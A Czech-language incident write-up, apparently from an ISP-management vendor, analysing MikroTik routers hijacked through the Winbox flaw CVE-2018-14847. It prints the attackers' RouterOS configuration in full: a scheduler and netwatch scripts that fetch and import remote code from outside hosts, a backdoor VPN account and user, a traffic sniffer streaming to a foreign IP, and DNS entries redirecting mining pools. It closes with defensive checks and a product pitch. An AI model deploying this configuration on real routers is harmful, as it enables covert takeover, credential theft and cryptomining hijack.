Jste si jistí, že nemáte v síti hacknutý MikroTik?

Podobné dokumenty
Příloha č. 2 Základní konfigurce. Základní konfigurace. Zařízení mikrotik

NAS 107 Seznámení s Control Center

DŮLEŽITÉ INFORMACE, PROSÍM ČTĚTE!

NAS 323 NAS jako VPN Server

NAS 269 Seznámení s Mail Serverem A S U S T O R C O L L E G E

i4 Portfolio s.r.o

Rychlý průvodce konfigurací verze 4.5

Audit bezpečnosti počítačové sítě. Předmět: Správa počítačových sítí Jiří Kalenský

Internet protokol, IP adresy, návaznost IP na nižší vrstvy

VDDMAIL by ESCAD, Corp. (Součást IWSE.NET Services by ESCAD, Corp.)

Návod pro připojení k síti VŠPJ prostřednictvím VPN Vysoká škola polytechnická Jihlava

LAN se používá k prvnímu nastavení Vašeho DVR a když potřebujete nastavit síť na Vašem DVR pro používání po internetu.

Instalační návod IP kamer

Rychlý průvodce konfigurací LAN SUITE 2002

Návod pro připojení telefonu Sony Ericsson P900 jako modem přes datový kabel a pro Windows 2000/XP

STRUČNÝ NÁVOD K POUŽITÍ

Semestrální projekt do předmětu SPS

Návod pro Windows XP. Příprava

1. Instalace MySQL Serveru Konfigurace MySql Serveru Vytvoření struktury databáze...3

Audit bezpečnosti počítačové sítě

registrace Fyzické (tj. MAC) adresy

B Series Waterproof Model. IP Kamera. Uživatelský manuál

VoIP telefon Gigaset A580IP

Instalace. Připojení zařízení. Vypněte všechna připojená síťová zařízení, včetně vašeho PC, modemu a routeru.

Použití programu WinProxy

Poznámky k vydání. pro Kerio Control 7.2.1

Nastavení programu pro práci v síti

SPARKLAN WX-7615A - návod k obsluze. Verze i4 Portfolio s.r.o.

SYSTEM EDUBASE INSTALAČNÍ PŘÍRUČKA

IM Instalace síťové verze SprutCAM. 1Nastavení serveru Vlastní instalace serveru...2 3Nastavení uživatelského počítače...

Popis zapojení jednotlivých provozních režimů WELL WRC7000N WiFi GW/AP/klient/repeater/switch, 300 Mb/s, R-SMA

Konfigurace Apple Mail a Outlook 2011

metodický list č. 1 Internet protokol, návaznost na nižší vrstvy, směrování

Co se děje za Firewallem. Máte zajištěna data a funkce systémů před útokem z vnitřního segmentu sítě?

Popis zapojení jednotlivých provozních režimů WELL WRC3500_V2 WiFi GW/AP/klient/repeater/switch, 54 Mb/s, R-SMA

Stručný návod pro software dodávaný jako příslušenství k NetMini adaptéru. Komunikace UPS \ NetAgent Mini DK532, DP532. O.K.SERVIS Plus s.r.o.

Quick Installation Guide

Při konfiguraci tohoto routeru používejte, prosím, pouze drátové síťové připojení.

Manuál pro nastavení telefonu Siemens C450 IP

ZYXEL P-660HW-T3 v2. nastavení modemu. vzorové nastavení ADSL

Routování na Mikrotiku

FlowMon ADS 3. Nová generace řešení pro analýzu provozu datové sítě. Pavel Minařík

Přední panel SP3364 SP3367

CAD pro. techniku prostředí (TZB) Počítačové sítě

... Default Gateway (Výchozí brána) DNS Address (DNS adresa) PPPoE User Name (Jméno uživatele) Password (Heslo) PPTP

1. Administrace služby Bezpečný Internet přes webovou aplikaci WebCare GTS

Enterprise Network Center

Návod pro Windows XP-OLD

Předmluva... 2 Popis panelu... 4 Obsah balení... 5 Instalace acces pointu... 5 Inicializace a nastavení acces pointu... 5 Řešení problémů...

INSTALAČNÍ MANUÁL. Tenda W301R Wireless-N Broadband Router

LAN/RS485. Převodník BMR Ethernet LAN/RS485

Administrace služby - GTS Network Storage

ANALÝZA TCP/IP 2 ANALÝZA PROTOKOLŮ DHCP, ARP, ICMP A DNS

Postup instalace přídavného modulu pro Aktuální zůstatky (CBA) v programu MultiCash KB (MCC)

Cisco IOS TCL skriptování využití SMTP knihovny

Rychlý postup k nastavení VoIP gatewaye ASUS VP100

TerraMaster U1. Domácí NAS server pro multimédia. Uživatelská příručka

NAS 224 Vzdálený přístup manuální nastavení

Instalační příručka Command WorkStation 5.6 se sadou Fiery Extended Applications 4.2

Nastavení Cisco SPA 122

Migrace Windows Small Business 2011 do Windows Server 2012 Essentials

Návod na nastavení bezdrátového routeru Asus WL-520g Deluxe v režimu klient

Podzim povzdychne, stále mumlá a odchází. On je prostě šaman!

NAS 109 Použití NAS s Linux

WiFiS Uživatelská příručka Obsah

Rychlá instalační příručka TP-LINK TL-WR741ND

Průvodce rychlou instalací AXIS 213

Uživatelský modul. WiFi STA

ZYXEL P-660HN-T3A. nastavení modemu. vzorové nastavení ADSL

Návod k použití telefonu Siemens Gigaset C450 IP pro službu viphone business

1. POSTUP INSTALACE A KONTROLA NASTAVENÍ MICROSOFT SQL SERVERU 2005 EXPRESS:

Instalační manuál. 1. Instalace hardwaru

Seznámení s Mikrotik RouterOS

Uživatelský manuál. Kerio Technologies

UŽIVATELSKÝ MANUÁL. Model R502 Multifunctional Broadband Router

Venkovní voděodolná P2P IP KAMERA WNS-HW28 UŽIVATELSKÝ MANUÁL

NVR Easyn pro IP kamery 1080p

1. Připojení k Internetu

Návod na změnu nastavení modemu s aktivní Wi-Fi ARRIS TG 2494

Instalace Microsoft SQL serveru 2012 Express

Průzkum a ověření možností směrování multicast provozu na platformě MikroTik.

Advanced IT infrastructure control: Do it better, safer, easier and cheaper. FlowMon ADS 3. Nová generace řešení pro analýzu provozu datové sítě

Kerio IMAP Migration Tool

ZÁKLADNÍ UŽIVATELSKÝ MANUÁL PRO SÍŤOVÉ FAXOVÁNÍ

Instalace. Samotný firewall již je s největší pravděpodobností nainstalovaný Zjistíme dle parametru při použití. aptitude search iptables

Instalace SMART Board Software

Provádí ochranu sítě před napadením (ochrana počítačů nestačí) Odděluje uživatele (prvek nespolehlivosti) od prvků ochrany

Návod na připojení k ové schránce Mozilla Thunderbird 3

Firmadat SMS Sender. aplikace pro odesílání SMS zpráv z Vašeho PC pomocí telefonu ZÁKLADNÍ INFORMACE A INSTALACE MILAN PASTOR, ROMAN NEPŠINSKÝ

V tomto návodu je jako příklad instalace a obsluhy popisován model TL-WR741ND.

IP kamery Relicam. Verze 2 UŽIVATELSKÝ MANUÁL

Botnet. Stručná charakteristika

Xesar. Uvedení do provozu Síťový adaptér

Komu je tato kniha určena? Jak je kniha uspořádána? Konvence použité v té to knize. Část i základy Microsoft Windows XP Professional

Administrace služby IP komplet premium

Administrace služby IP komplet premium

Nastavení ového účtu Outlook 2007

software Manual Net Configuration Tool

Datacard. Instrukce k aktualizaci firmware tiskáren. Aktualizační aplikace pro operační systémy Windows

Transkript:

Jste si jistí, že nemáte v síti hacknutý MikroTik? V poslední době jsme narazili na několik MikroTik routerů, které vypadaly na první pohled standardně (Běžel přes ně provoz. Bylo možné se na ně přihlásit pomocí Winboxu.), ale u kterých se při podrobnějším prozkoumání ukázalo, že odesílají spam přes SMTP protokol. Pojďme se podívat na konkrétní příklad: Během několika minut se v emailové frontě objevilo více než 50 000 emailů. To není v pořádku. Daný router používal MikroTik RouterOS ve verzi 6.42.7. Nicméně k hacknutí muselo dojít někdy mezi 1.8.2018 a 1.9.2018. V té době byla na routeru nainstalována verze 6.40.x. K upgradu na verzi 6.42.7 došlo později, kdy byl již router kompromitován. Po analýze konfigurace routeru jsme zjistili, že na routeru byl zapnutý SOCKS server a přes něj byl celý router ovládán. SOCKS server běžel na portu 44550, ale je pravděpodobné, že používaný port může být na každém hacknutém routeru jiný. Analýza routeru 1) SOCKS server povolen /ip socks set enabled=yes port=44550

2) Nová pravidla ve Firewallu Ve firewallu byla spousta identických pravidel povolujících spojení na port 44550. /ip firewall filter Celkem zde bylo 71 stejných pravidel. Pravděpodobně se při každém úspěšném útoku přidalo jedno pravidlo. To znamená, že router byl napaden celkem 71krát.

3) Web proxy na portu 52107 povolena /ip proxy set anonymous=yes cache-on-disk=yes cache-path=web-proxy1 enabled=yes port=52107

4) Přidána pravidla pro přesměrování portů do NATu /ip firewall nat add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=\ 149.56.27.80 to-ports=3333 add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=\ 149.56.27.80 to-ports=3333 add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=\ 209.239.112.96 to-ports=4444 add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=\ 209.239.112.96 to-ports=4444 add action=dst-nat chain=dst-nat dst-port=4444 protocol=tcp to-addresses=\ 209.239.112.96 to-ports=4444 Při analýze síťového provozu je zřejmé, že na SOCKS server, na port 44550, se automaticky připojuje hned několik IP adres. Z dalších IP adres probíhalo skenování portů na otevřené služby.

5) Přidán účet pro připojení přes VPN /ppp secret add name=dodo password=dodo profile=dodo 6) Přidány statické DNS záznamy (Celý seznam je na konci dokumentu.)

Pokud měl nějaký počítač v síti nastavené DNS na napadený router, tak při pokusu o přístup na adresu ze seznamu byl cílový provoz přesměrován na úplně jinou IP adresu. Přesměrování probíhalo na tyto adresy: 185.205.210.23 209.239.112.96 7) Načasované úlohy /system scheduler add interval=5m name=u5 on-event="/tool fetch url=http://ciskotik.com/poll/9b6\ 482da-f83c-4573-af8b-d6b486188b85 mode=http dst-path=7xe7zt46hb08\r\ \n/import 7xe7zt46hb08" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ sep/06/2018 start-time=16:16:11 Scheduler se pokoušel stáhnout skript a ten následně spustit URL http://ciskotik.com/poll/9b6482da-f83c-4573-af8b-d6b486188b85 však již nebyla 24.9.2018 aktivní. 8) Další instalovaná vychytávka v Netwatch /tool netwatch add comment=1 host=127.0.0.1 interval=30s up-script="\r\ \n/tool fetch url=\"http://47.96.89.95:8000/autosupout.rif\" dst-path=auto\ supout.rif\r\ \n:delay 5\r\ \n/im autosupout.rif\r\ \n/file remove [find name=autosupout.rif]\r\ \n \r\ \n:delay 3\r\ \n/tool netw en [find comment=2]\r\ \n" add comment=2 down-script="/tool net dis [find comment=1]\r\ \n:delay 30\r\ \n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \ timeout=1ms URL http://47.96.89.95:8000/autosupout.rif obsahuje skript :if ([:len [/tool netw find]]=0) do={ /tool netwatch add comment=1 host=127.0.0.1 interval=30s up-script="\r\ \n/tool fetch url=\"http://47.96.89.95:8000/autosupout.rif\" dst-path=autosu\ pout.rif\r\ \n:delay 5\r\ \n/im autosupout.rif\r\ \n/file remove [find name=autosupout.rif]\r\ \n \r\ \n:delay 3\r\ \n/tool netw en [find comment=2]\r\ \n"

add disabled=yes comment=2 down-script="/tool net dis [find comment=1]\r\ \n:delay 30\r\ \n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \ timeout=1ms } :if ([/in l2tp-s ser get enabled ]=false) do={/in l2tp-s ser set en=yes} :if ([:len [/user find name=default]]=0) do={/user add name=default pass=jackk} IP adresa 47.96.89.95 má podle Whois domov v Číně: inetnum: 47.96.0.0-47.97.255.255 netname: ALISOFT descr: Aliyun Computing Co., LTD descr: 5F, Builing D, the West Lake International Plaza of S&T descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099 country: CN admin-c: ZM1015-AP tech-c: ZM877-AP tech-c: ZM876-AP tech-c: ZM875-AP mnt-by: MAINT-CNNIC-AP mnt-irt: IRT-CNNIC-CN status: ALLOCATED PORTABLE last-modified: 2015-02-27T01:59:04Z source: APNIC 9) Sniffer /tool sniffer set file-limit=100kib filter-interface=all filter-ip-protocol=tcp \ filter-port=ftp-data,ftp filter-stream=yes streaming-enabled=yes \ streaming-server=125.212.228.198 Cílová IP adresa 125.212.228.198 je podle Whois ve Vietnamu: inetnum: 125.212.128.0-125.212.255.255 netname: VIETTEL-VN descr: Viettel Group descr: No 1, Tran Huu Duc street, My Dinh 2 ward, Nam Tu Liem district, Ha Noi City country: VN admin-c: TVT8-AP tech-c: NDT9-AP remarks: For spamming matters, mail to soc@viettel.com.vn mnt-by: MAINT-VN-VNNIC status: ALLOCATED PORTABLE mnt-irt: IRT-VNNIC-AP last-modified: 2017-11-11T09:41:33Z source: APNIC

Díky Snifferu útočníci zjistili, který SMTP server se používá pro odesílání mailu a následně jej využili k odesílání spamů. Ke kompromitaci routeru došlo s největší pravděpodobností přes Winbox (CVE-2018-14847). Z analýzy je patrné, že hackeři této zranitelnosti využili k tomu, aby následně mohli napadené routery použít ke svým zlovolným účelům. Bližší informace naleznete na https://blog.mikrotik.com/security/winbox-vulnerability.html nebo https://n0p.me/winbox-bug-dissection/. Vzhledem k tomu, že ke kompromitaci routeru došlo dříve, tak po upgradu na verzi 6.42.7 byly všechny skripty a SOCKS server aktivní, takže router byl stále pod správou útočníků. Doporučujeme provést kontrolu routerů: 1) Zkontrolujte aktivní služby: /system services 2) Zkontrolujte, zdali není aktivní SOCKS server: /ip socks 3) Zkontrolujte, zdali není aktivní Web proxy: /ip web proxy 4) Zkontrolujte skripty: /system scripts 5) Povolte SSH, Winbox a API přístup pouze z důvěryhodných IP adres 6) Udržujte aktuální verzi RouterOS

V ISPadminu 5.02 beta1 je možné otestovat, zdali na routeru neběží Web proxy, SOCKS server a/nebo Sniffer. Také je možné provést hromadnou aktualizaci RouterOS. V Hardware / Routery / Router status / Dashboard najdete přehled routerů MikroTik. Jsou zde zobrazeny informace o instalovaných verzích RouterOS a o aktivních službách (/ip services). Taktéž jsou zde informace o tom, zdali je na některém routeru aktivní SOCKS server a/nebo Web proxy. Kliknutím na počet routerů se zobrazí detaily.

Pokud například kliknete na číslo v řádku Telnet a sloupci Celkem, budete přesměrováni na stránku s přehledem routerů, na kterých je spuštěn Telnet.

Pokud zaškrtnete příslušné checkboxy a z pop-up menu vyberete Aktualizovat Mikrotik OS, tak se u daných routerů provede upgrade na nejnovější verzi. Routery musí mít přístup k Internetu, aby si mohly stáhnout aktualizace. Bližší informace o aktualizaci routerů najdete na https://wiki.ispadmin.eu/cz/changelog/ispadmin-5-01

Výpis statických DNS /ip dns static add address=185.205.210.23 name=asia1.ethermine.org add address=185.205.210.23 name=asia1.ethpool.org add address=185.205.210.23 name=asia1.fullhashed.com add address=185.205.210.23 name=asia2.ethermine.org add address=185.205.210.23 name=cn.sparkpool.com add address=185.205.210.23 name=aurorapool.net add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com add address=185.205.210.23 name=coinotron.com add address=185.205.210.23 name=eth.1stpool.com add address=185.205.210.23 name=eth.anorak.tech add address=185.205.210.23 name=eth.2miners.com add address=185.205.210.23 name=eth.antpool.com add address=185.205.210.23 name=eth-ar.dwarfpool.com add address=185.205.210.23 name=eth.arsmine.net add address=185.205.210.23 name=eth-as.coinmine.pl add address=185.205.210.23 name=eth-asia1.nanopool.org add address=185.205.210.23 name=eth-br.dwarfpool.com add address=185.205.210.23 name=eth.chileminers.cl add address=185.205.210.23 name=eth.coinfoundry.org add address=185.205.210.23 name=eth.coinmine.pl add address=185.205.210.23 name=ethepool.com add address=185.205.210.23 name=ether.bw.com add address=185.205.210.23 name=etherdig.net add address=185.205.210.23 name=ethereum.marshsoftware.ca add address=185.205.210.23 name=ethereumpool.club add address=185.205.210.23 name=ethergrab.us add address=185.205.210.23 name=ethermine.ru add address=185.205.210.23 name=ethertrench.com add address=185.205.210.23 name=eth.ethertrench.com add address=185.205.210.23 name=eth-eu1.nanopool.org add address=185.205.210.23 name=eth-eu.coinmine.pl add address=185.205.210.23 name=eth-eu.dwarfpool.com add address=185.205.210.23 name=eth-eu.mining.sk add address=185.205.210.23 name=eth-eu.pool.sexy add address=185.205.210.23 name=eth.f2pool.com add address=185.205.210.23 name=eth.gigantpool.com add address=185.205.210.23 name=eth.gpumine.org add address=185.205.210.23 name=eth-hk.dwarfpool.com add address=185.205.210.23 name=eth.miningcity.org add address=185.205.210.23 name=eth.mymininghub.com add address=185.205.210.23 name=eth.pool.minergate.com add address=185.205.210.23 name=eth.poolmining.org

add address=185.205.210.23 name=eth-pool.ucrypto.net add address=185.205.210.23 name=eth.pool.zet-tech.eu add address=185.205.210.23 name=eth-ru.dwarfpool.com add address=185.205.210.23 name=eth-ru.edgestile.io add address=185.205.210.23 name=eth-ru.mining.sk add address=185.205.210.23 name=eth-sg.dwarfpool.com add address=185.205.210.23 name=eth.soyminero.es add address=185.205.210.23 name=eth.suprnova.cc add address=185.205.210.23 name=eth.uleypool.com add address=185.205.210.23 name=eth-us.coinmine.pl add address=185.205.210.23 name=eth-us.dwarfpool.com add address=185.205.210.23 name=eth-us-east1.nanopool.org add address=185.205.210.23 name=eth-us.maxhash.org add address=185.205.210.23 name=eth-us.pool.sexy add address=185.205.210.23 name=eth-us-west1.nanopool.org add address=185.205.210.23 name=eth.waterhole.io add address=185.205.210.23 name=eth.xeminer.net add address=185.205.210.23 name=eth.zion.net.co add address=185.205.210.23 name=eu1.ethermine.org add address=185.205.210.23 name=eu1.ethpool.org add address=185.205.210.23 name=eu2.ethermine.org add address=185.205.210.23 name=eu.99miners.com add address=185.205.210.23 name=eu.ethmine.club add address=185.205.210.23 name=eu.sparkpool.com add address=185.205.210.23 name=huabei2-pool.ethfans.org add address=185.205.210.23 name=huabei-pool.ethfans.org add address=185.205.210.23 name=miningcity.org add address=185.205.210.23 name=my.ethpool.net add address=185.205.210.23 name=na-west.sparkpool.com add address=185.205.210.23 name=na-east.sparkpool.com add address=185.205.210.23 name=noobpool.com add address=185.205.210.23 name=pool.ethfans.org add address=185.205.210.23 name=pool.virtualmining.pt add address=185.205.210.23 name=s.comining.io add address=185.205.210.23 name=us1.ethermine.org add address=185.205.210.23 name=us1.ethpool.org add address=185.205.210.23 name=us2.ethermine.org add address=185.205.210.23 name=us2.ethpool.org add address=185.205.210.23 name=vaux-all.uk add address=209.239.112.96 name=stratum.antpool.com add address=209.239.112.96 name=stratum.slushpool.com add address=209.239.112.96 name=cn.stratum.slushpool.com add address=209.239.112.96 name=eu.stratum.slushpool.com add address=209.239.112.96 name=jp-stratum.btcc.com add address=209.239.112.96 name=mint.bitminter.com add address=209.239.112.96 name=us.ss.btc.com add address=209.239.112.96 name=na-west.sparkpool.com add address=209.239.112.96 name=asia1.ethermine.org add address=209.239.112.96 name=na-east.sparkpool.com add address=209.239.112.96 name=asia1.ethpool.org add address=209.239.112.96 name=tw.sparkpool.com add address=209.239.112.96 name=asia1.fullhashed.com add address=209.239.112.96 name=kr.sparkpool.com add address=209.239.112.96 name=asia2.ethermine.org add address=209.239.112.96 name=jp.sparkpool.com add address=209.239.112.96 name=cn.sparkpool.com

add address=209.239.112.96 name=bitcoin.viabtc.com add address=209.239.112.96 name=aurorapool.net add address=209.239.112.96 name=stratum-us.f2pool.com add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com add address=209.239.112.96 name=stratum.f2pool.com add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com add address=209.239.112.96 name=stratum.btcguild.com add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com add address=209.239.112.96 name=stratum.btccpool.com add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com add address=209.239.112.96 name=stratum.btc.top add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com add address=209.239.112.96 name=coinotron.com add address=209.239.112.96 name=eth.1stpool.com add address=209.239.112.96 name=eth.anorak.tech add address=209.239.112.96 name=eth.2miners.com add address=209.239.112.96 name=eth.antpool.com add address=209.239.112.96 name=eth-ar.dwarfpool.com add address=209.239.112.96 name=eth.arsmine.net add address=209.239.112.96 name=eth-as.coinmine.pl add address=209.239.112.96 name=eth-asia1.nanopool.org add address=209.239.112.96 name=eth-br.dwarfpool.com add address=209.239.112.96 name=eth.chileminers.cl add address=209.239.112.96 name=eth.coinfoundry.org add address=209.239.112.96 name=eth.coinmine.pl add address=209.239.112.96 name=ethepool.com add address=209.239.112.96 name=ether.bw.com add address=209.239.112.96 name=etherdig.net add address=209.239.112.96 name=ethereum.marshsoftware.ca add address=209.239.112.96 name=ethereumpool.club add address=209.239.112.96 name=ethergrab.us add address=209.239.112.96 name=ethermine.ru add address=209.239.112.96 name=ethertrench.com add address=209.239.112.96 name=eth.ethertrench.com add address=209.239.112.96 name=eth-eu1.nanopool.org add address=209.239.112.96 name=eth-eu.coinmine.pl add address=209.239.112.96 name=eth-eu.dwarfpool.com add address=209.239.112.96 name=eth-eu.mining.sk add address=209.239.112.96 name=eth-eu.pool.sexy add address=209.239.112.96 name=eth.f2pool.com add address=209.239.112.96 name=eth.gigantpool.com add address=209.239.112.96 name=eth.gpumine.org add address=209.239.112.96 name=eth-hk.dwarfpool.com add address=209.239.112.96 name=eth.miningcity.org add address=209.239.112.96 name=eth.mymininghub.com add address=209.239.112.96 name=eth.pool.minergate.com add address=209.239.112.96 name=eth.poolmining.org add address=209.239.112.96 name=eth-pool.ucrypto.net add address=209.239.112.96 name=eth.pool.zet-tech.eu add address=209.239.112.96 name=eth-ru.dwarfpool.com add address=209.239.112.96 name=eth-ru.edgestile.io add address=209.239.112.96 name=eth-ru.mining.sk add address=209.239.112.96 name=eth-sg.dwarfpool.com add address=209.239.112.96 name=eth.soyminero.es add address=209.239.112.96 name=eth.suprnova.cc

add address=209.239.112.96 name=eth.uleypool.com add address=209.239.112.96 name=eth-us.coinmine.pl add address=209.239.112.96 name=eth-us.dwarfpool.com add address=209.239.112.96 name=eth-us-east1.nanopool.org add address=209.239.112.96 name=eth-us.maxhash.org add address=209.239.112.96 name=eth-us.pool.sexy add address=209.239.112.96 name=eth-us-west1.nanopool.org add address=209.239.112.96 name=eth.waterhole.io add address=209.239.112.96 name=eth.xeminer.net add address=209.239.112.96 name=eth.zion.net.co add address=209.239.112.96 name=eu1.ethermine.org add address=209.239.112.96 name=eu1.ethpool.org add address=209.239.112.96 name=eu2.ethermine.org add address=209.239.112.96 name=eu.99miners.com add address=209.239.112.96 name=eu.ethmine.club add address=209.239.112.96 name=eu.sparkpool.com add address=209.239.112.96 name=huabei2-pool.ethfans.org add address=209.239.112.96 name=huabei-pool.ethfans.org add address=209.239.112.96 name=miningcity.org add address=209.239.112.96 name=my.ethpool.net add address=209.239.112.96 name=noobpool.com add address=209.239.112.96 name=pool.ethfans.org add address=209.239.112.96 name=pool.virtualmining.pt add address=209.239.112.96 name=s.comining.io add address=209.239.112.96 name=us1.ethermine.org add address=209.239.112.96 name=us1.ethpool.org add address=209.239.112.96 name=us2.ethermine.org add address=209.239.112.96 name=us2.ethpool.org add address=209.239.112.96 name=vaux-all.uk